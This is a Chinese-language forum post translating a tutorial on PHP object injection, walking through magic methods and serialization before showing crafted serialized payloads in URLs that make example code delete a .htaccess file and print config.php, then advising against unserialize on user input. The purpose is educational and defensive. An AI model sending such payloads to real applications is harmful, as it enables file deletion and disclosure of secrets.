終身高級(jí)VIP會(huì)員
Dark Windy
  
- 資源幣
- 340
- 積分
- 373
- 貢獻(xiàn)
- 0
- 在線時(shí)間
- 74 小時(shí)
- 注冊(cè)時(shí)間
- 2015-8-14
- 最后登錄
- 2024-6-3
|
0x00 背景
原文:http://securitycafe.ro/2015/01/0 ... p-object-injection/
php對(duì)象注入是一個(gè)非常常見的漏洞,這個(gè)類型的漏洞雖然有些難以利用,但仍舊非常危險(xiǎn)�����,為了理解這個(gè)漏洞�,請(qǐng)讀者具備基礎(chǔ)的php知識(shí)。
0x01 漏洞案例
如果你覺得這是個(gè)渣渣洞�,那么請(qǐng)看一眼這個(gè)列表,一些被審計(jì)狗挖到過該漏洞的系統(tǒng)�,你可以發(fā)現(xiàn)都是一些耳熟能詳?shù)耐嬉猓ň蛧?guó)外來說)
WordPress 3.6.1
Magento 1.9.0.1
Joomla 3.0.3
Ip board 3.3.5
除此之外等等一堆系統(tǒng),八成可能大概在這些還有其他的php程序中還有很多這種類型的漏洞�����,所以不妨考慮坐下喝杯咖啡并且試著去理解這篇文章����。
0x01 PHP類和對(duì)象
類和變量是非常容易理解的php概念����,打個(gè)比方,下面的代碼在一個(gè)類中定義了一個(gè)變量和一個(gè)方法�����。
<?php
class TestClass
{
// 一個(gè)變量
public $variable = 'This is a string';
// 一個(gè)簡(jiǎn)單的方法
public function PrintVariable()
{
echo $this->variable;
}
}
// 創(chuàng)建一個(gè)對(duì)象
$object = new TestClass();
// 調(diào)用一個(gè)方法
$object->PrintVariable();
?>
它創(chuàng)建了一個(gè)對(duì)象并且調(diào)用了 PrintVariable 函數(shù)�,該函數(shù)會(huì)輸出變量 variable。
如果想了解更多關(guān)于php面向?qū)ο缶幊痰闹R(shí) 請(qǐng)點(diǎn): http://php.net/manual/zh/language.oop5.php
0x02 php magic方法
php類可能會(huì)包含一些特殊的函數(shù)叫magic函數(shù)����,magic函數(shù)命名是以符號(hào)“__”開頭的�����,比如 __construct, __destruct, __toString, __sleep, __wakeup 和其他的一些玩意����。
這些函數(shù)在某些情況下會(huì)自動(dòng)調(diào)用�,比如:
__construct 當(dāng)一個(gè)對(duì)象創(chuàng)建時(shí)調(diào)用 (constructor) __destruct 當(dāng)一個(gè)對(duì)象被銷毀時(shí)調(diào)用 (destructor) __ toString當(dāng)一個(gè)對(duì)象被當(dāng)作一個(gè)字符串使用
為了更好的理解magic方法是如何工作的,讓我們添加一個(gè)magic方法在我們的類中����。
<?php
class TestClass
{
// 一個(gè)變量
public $variable = 'This is a string';
// 一個(gè)簡(jiǎn)單的方法
public function PrintVariable()
{
echo $this->variable . '<br />';
}
// Constructor
public function __construct()
{
echo '__construct <br />';
}
// Destructor
public function __destruct()
{
echo '__destruct <br />';
}
// Call
public function __toString()
{
return '__toString<br />';
}
}
// 創(chuàng)建一個(gè)對(duì)象
// __construct會(huì)被調(diào)用
$object = new TestClass();
// 創(chuàng)建一個(gè)方法
// 'This is a string’ 這玩意會(huì)被輸出
$object->PrintVariable();
// 對(duì)象被當(dāng)作一個(gè)字符串
// __toString 會(huì)被調(diào)用
echo $object;
// End of PHP script
// php腳本要結(jié)束了, __destruct會(huì)被調(diào)用
?>
我們往里頭放了三個(gè) magic方法����,__construct, __destruct和 __toString,你可以看出來���,__construct在對(duì)象創(chuàng)建時(shí)調(diào)用����, __destruct在php腳本結(jié)束時(shí)調(diào)用����,__toString在對(duì)象被當(dāng)作一個(gè)字符串使用時(shí)調(diào)用���。
這個(gè)腳本會(huì)輸出這狗樣:
__construct
This is a string
__toString
__destruct
這只是一個(gè)簡(jiǎn)單的例子,如果你想了解更多有關(guān)magic函數(shù)的例子���,請(qǐng)點(diǎn)擊下面的鏈接:
http://php.net/manual/zh/language.oop5.magic.php
0x03 php對(duì)象序列化
php允許保存一個(gè)對(duì)象方便以后重用����,這個(gè)過程被稱為序列化����,打個(gè)比方���,你可以保存一個(gè)包含著用戶信息的對(duì)象方便等等重用���。
為了序列化一個(gè)對(duì)象,你需要調(diào)用 “serialize”函數(shù)�����,函數(shù)會(huì)返回一個(gè)字符串���,當(dāng)你需要用到這個(gè)對(duì)象的時(shí)候可以使用“unserialize”去重建對(duì)象���。
讓我們?cè)谛蛄谢瘉G進(jìn)那個(gè)例子����,看看序列化張什么樣���。
<?php
// 某類
class User
{
// 類數(shù)據(jù)
public $age = 0;
public $name = '';
// 輸出數(shù)據(jù)
public function PrintData()
{
echo 'User ' . $this->name . ' is ' . $this->age
. ' years old. <br />';
}
}
// 創(chuàng)建一個(gè)對(duì)象
$usr = new User();
// 設(shè)置數(shù)據(jù)
$usr->age = 20;
$usr->name = 'John';
// 輸出數(shù)據(jù)
$usr->PrintData();
// 輸出序列化之后的數(shù)據(jù)
echo serialize($usr);
?>
它會(huì)輸出
User John is 20 years old.
O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}
你可以看到序列化之后的數(shù)據(jù)中 有 20和John���,其中沒有任何跟類有關(guān)的東西,只有其中的數(shù)據(jù)被數(shù)據(jù)化���。
為了使用這個(gè)對(duì)象���,我們用unserialize重建對(duì)象。
<?php
// 某類
class User
{
// Class data
public $age = 0;
public $name = '';
// Print data
public function PrintData()
{
echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
}
}
// 重建對(duì)象
$usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}');
// 調(diào)用PrintData 輸出數(shù)據(jù)
$usr->PrintData();
?>
著會(huì)輸出
User John is 20 years old
0x04 序列化magic函數(shù)
magic函數(shù)constructor (__construct)和 destructor (__destruct) 是會(huì)在對(duì)象創(chuàng)建或者銷毀時(shí)自動(dòng)調(diào)用�����,其他的一些magic函數(shù)會(huì)在serialize 或者 unserialize的時(shí)候被調(diào)用����。
__sleep magic方法在一個(gè)對(duì)象被序列化的時(shí)候調(diào)用�����。 __wakeup magic方法在一個(gè)對(duì)象被反序列化的時(shí)候調(diào)用���。
注意 __sleep 必須返回一個(gè)數(shù)組與序列化的變量名。
<?php
class Test
{
public $variable = 'BUZZ';
public $variable2 = 'OTHER';
public function PrintVariable()
{
echo $this->variable . '<br />';
}
public function __construct()
{
echo '__construct<br />';
}
public function __destruct()
{
echo '__destruct<br />';
}
public function __wakeup()
{
echo '__wakeup<br />';
}
public function __sleep()
{
echo '__sleep<br />';
return array('variable', 'variable2');
}
}
// 創(chuàng)建一個(gè)對(duì)象����,會(huì)調(diào)用 __construct
$obj = new Test();
// 序列化一個(gè)對(duì)象,會(huì)調(diào)用 __sleep
$serialized = serialize($obj);
//輸出序列化后的字符串
print 'Serialized: ' . $serialized . <br />';
// 重建對(duì)象�����,會(huì)調(diào)用 __wakeup
$obj2 = unserialize($serialized);
//調(diào)用 PintVariable, 會(huì)輸出數(shù)據(jù) (BUZZ)
$obj2->PrintVariable();
// php腳本結(jié)束�����,會(huì)調(diào)用 __destruct
?>
這玩意會(huì)輸出:
__construct
__sleep
Serialized: O:4:"Test":2:
{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";}
__wakeup
BUZZ
__destruct
__destruct
你可以看到���,我們創(chuàng)建了一個(gè)對(duì)象,序列化了它(然后__sleep被調(diào)用)����,之后用序列化對(duì)象重建后的對(duì)象創(chuàng)建了另一個(gè)對(duì)象���,接著php腳本結(jié)束的時(shí)候兩個(gè)對(duì)象的__destruct都會(huì)被調(diào)用。
更多相關(guān)的內(nèi)容
http://php.net/manual/zh/language.oop5.serialization.php
0x05 php對(duì)象注入
現(xiàn)在我們理解了序列化是如何工作的����,我們?cè)撊绾卫盟渴聦?shí)上����,利用這玩意的可能性有很多種,關(guān)鍵取決于應(yīng)用程序的流程與�����,可用的類�����,與magic函數(shù)�����。
記住序列化對(duì)象的值是可控的�����。
你可能會(huì)找到一套web程序的源代碼,其中某個(gè)類的__wakeup 或者 __destruct and其他亂七八糟的函數(shù)會(huì)影響到web程序����。
打個(gè)比方,我們可能會(huì)找到一個(gè)類用于臨時(shí)將日志儲(chǔ)存進(jìn)某個(gè)文件���,當(dāng)__destruct被調(diào)用時(shí)�����,日志文件會(huì)被刪除���。然后代碼張這狗樣。
<?php
class LogFile
{
// log文件名
public $filename = 'error.log';
// 某代碼����,儲(chǔ)存日志進(jìn)文件
public function LogData($text)
{
echo 'Log some data: ' . $text . '<br />';
file_put_contents($this->filename, $text, FILE_APPEND);
}
// Destructor 刪除日志文件
public function __destruct()
{
echo '__destruct deletes "' . $this->filename . '" file. <br />';
unlink(dirname(__FILE__) . '/' . $this->filename);
}
}
?>
某例子關(guān)于如何使用這個(gè)類
<?php
include 'logfile.php';
// 創(chuàng)建一個(gè)對(duì)象
$obj = new LogFile();
// 設(shè)置文件名和要儲(chǔ)存的日志數(shù)據(jù)
$obj->filename = 'somefile.log';
$obj->LogData('Test');
// php腳本結(jié)束啦,__destruct被調(diào)用���,somefile.log文件被刪除。
?>
在其他的腳本�����,我們可能又恰好找到一個(gè)調(diào)用“unserialize”函數(shù)的,并且恰好變量是用戶可控的�����,又恰好是$_GET之類的什么玩意的����。
<?php
include 'logfile.php';
// ... 一些狗日的代碼和 LogFile 類 ...
// 簡(jiǎn)單的類定義
class User
{
// 類數(shù)據(jù)
public $age = 0;
public $name = '';
// 輸出數(shù)據(jù)
public function PrintData()
{
echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
}
}
// 重建 用戶輸入的 數(shù)據(jù)
$usr = unserialize($_GET['usr_serialized']);
?>
你看,這個(gè)代碼調(diào)用了 “LogClass” 類�����,并且有一個(gè) “unserialize” 值是我們可以注入的�����。
所以構(gòu)造類似這樣的東西:
script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}
究竟發(fā)生了什么呢���,因?yàn)檩斎胧强煽氐���,所以我們可以?gòu)造任意的序列化對(duì)象,比如:
<?php
$obj = new LogFile();
$obj->filename = '.htaccess';
echo serialize($obj) . '<br />';
?>
這個(gè)會(huì)輸出
O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";}
__destruct deletes ".htaccess" file.
現(xiàn)在我們將構(gòu)造過后的序列化對(duì)象發(fā)送給剛才的腳本:
script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess”;}
這會(huì)輸出
__destruct deletes ".htaccess" file.
現(xiàn)在 .htaccess 已經(jīng)被干掉了���,因?yàn)槟_本結(jié)束時(shí) __destruct會(huì)被調(diào)用���。不過我們已經(jīng)可以控制“LogFile”類的變量啦����。
這就是漏洞名稱的由來:變量可控并且進(jìn)行了unserialize操作的地方注入序列化對(duì)象����,實(shí)現(xiàn)代碼執(zhí)行或者其他坑爹的行為。
雖然這不是一個(gè)很好的例子����,不過我相信你可以理解這個(gè)概念,unserialize自動(dòng)調(diào)用 __wakeup 和 __destruct���,接著攻擊者可以控制類變量�����,并且攻擊web程序���。
0x06 常見的注入點(diǎn)
先不談 __wakeup 和 __destruct,還有一些很常見的注入點(diǎn)允許你利用這個(gè)類型的漏洞����,一切都是取決于程序邏輯。
打個(gè)比方����,某用戶類定義了一個(gè)__toString為了讓應(yīng)用程序能夠?qū)㈩愖鳛橐粋(gè)字符串輸出(echo $obj) ,而且其他類也可能定義了一個(gè)類允許__toString讀取某個(gè)文件。
<?php
// … 一些include ...
class FileClass
{
// 文件名
public $filename = 'error.log';
//當(dāng)對(duì)象被作為一個(gè)字符串會(huì)讀取這個(gè)文件
public function __toString()
{
return file_get_contents($this->filename);
}
}
// Main User class
class User
{
// Class data
public $age = 0;
public $name = '';
// 允許對(duì)象作為一個(gè)字符串輸出上面的data
public function __toString()
{
return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
}
}
// 用戶可控
$obj = unserialize($_GET['usr_serialized']);
// 輸出 __toString
echo $obj;
?>
so,我們構(gòu)造url
script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}
再想想����,如果我們用序列化調(diào)用 FileClass呢
我們創(chuàng)建利用代碼
<?php
$fileobj = new FileClass();
$fileobj->filename = 'config.php';
echo serialize($fileobj);
?>
接著用生成的exp注入url
script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php”;}
接著網(wǎng)頁(yè)會(huì)輸出 config.php的源代碼
<?php
$private_data = 'MAGIC';
?>
ps:我希望這讓你能夠理解。
0x07 其他的利用方法
可能其他的一些magic函數(shù)海存在利用點(diǎn):比如__call 會(huì)在對(duì)象調(diào)用不存在的函數(shù)時(shí)調(diào)用���,__get 和 __set會(huì)在對(duì)象嘗試訪問一些不存在的類���,變量等等時(shí)調(diào)用。
不過需要注意的是�����,利用場(chǎng)景不限于magic函數(shù)���,也有一些方式可以在一半的函數(shù)中利用這個(gè)漏洞����,打個(gè)比方,一個(gè)模塊可能定義了一個(gè)叫g(shù)et的函數(shù)進(jìn)行一些敏感的操作����,比如訪問數(shù)據(jù)庫(kù),這就可能造成sql注入����,取決于函數(shù)本身的操作。
唯一的一個(gè)技術(shù)難點(diǎn)在于�����,注入的類必須在注入點(diǎn)所在的地方���,不過一些模塊或者腳本會(huì)使用“autoload”的功能����,具體可以在這里了解
http://php.net/manual/zh/language.oop5.autoload.php
ps:去讀那狗屎的代碼
0x08 如何利用或者避免這個(gè)漏洞
別在任何用戶可控的地方使用“unserialize”���,可以考慮“json_decode“
0x09 結(jié)論
雖然很難找到而且很難利用�����,但是這真的真的很嚴(yán)重���,可以導(dǎo)致各種各樣的漏洞���。
|
|
發(fā)表于 2015-8-15 16:35:20
收藏